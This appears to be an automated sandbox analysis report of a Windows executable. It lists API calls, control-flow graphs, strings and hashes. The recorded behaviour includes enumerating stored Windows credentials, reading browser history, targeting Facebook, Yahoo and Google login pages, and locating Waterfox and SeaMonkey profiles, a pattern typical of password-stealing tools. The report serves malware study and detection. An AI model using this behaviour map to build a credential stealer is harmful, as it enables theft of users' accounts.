                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                  • String ID: bhv
                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                  • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                  • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2941347001-70141382
                                                                                                                  • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                  • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                  • String ID: visited:
                                                                                                                  • API String ID: 2470578098-1702587658
                                                                                                                  • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                  • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                  • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                  • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 770 40bdb0-40bdce call 404363 773 40bf63-40bf6f call 40440c 770->773 774 40bdd4-40bddd 770->774 775 40bdee 774->775 776 40bddf-40bdec CredEnumerateW 774->776 778 40bdf0-40bdf2 775->778 776->778 778->773 780 40bdf8-40be18 call 40b2cc wcslen 778->780 783 40bf5d-40bf60 LocalFree 780->783 784 40be1e-40be20 780->784 783->773 784->783 785 40be26-40be42 wcsncmp 784->785 786 40be48-40be77 call 40bd5d call 404423 785->786 787 40bf4e-40bf57 785->787 786->787 792 40be7d-40bea3 memset 786->792 787->783 787->784 793 40bea5 792->793 794 40bea7-40beea memcpy 792->794 793->794 795 40bf11-40bf2d wcschr 794->795 796 40beec-40bf06 call 40b2cc _wcsnicmp 794->796 798 40bf38-40bf48 LocalFree 795->798 799 40bf2f-40bf35 795->799 796->795 801 40bf08-40bf0e 796->801 798->787 799->798 801->795
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                  • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1564206659-0
                                                                                                                  • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                  • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                  • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                  • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 855 41837f-4183bf 856 4183c1-4183cc call 418197 855->856 857 4183dc-4183ec call 418160 855->857 862 4183d2-4183d8 856->862 863 418517-41851d 856->863 864 4183f6-41840b 857->864 865 4183ee-4183f1 857->865 862->857 866 418417-418423 864->866 867 41840d-418415 864->867 865->863 868 418427-418442 call 41739b 866->868 867->868 871 418444-41845d CreateFileW 868->871 872 41845f-418475 CreateFileA 868->872 873 418477-41847c 871->873 872->873 874 4184c2-4184c7 873->874 875 41847e-418495 GetLastError free 873->875 878 4184d5-418501 memset call 418758 874->878 879 4184c9-4184d3 874->879 876 4184b5-4184c0 call 444706 875->876 877 418497-4184b3 call 41837f 875->877 876->863 877->863 883 418506-418515 free 878->883 879->878 883->863
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                  • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                  • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                  • String ID: r!A
                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                  • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                  • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                  • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                  • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                                  • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID: C:\Windows\system32
                                                                                                                  • API String ID: 669240632-2896066436
                                                                                                                  • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                  • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                  • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                  • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                  • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
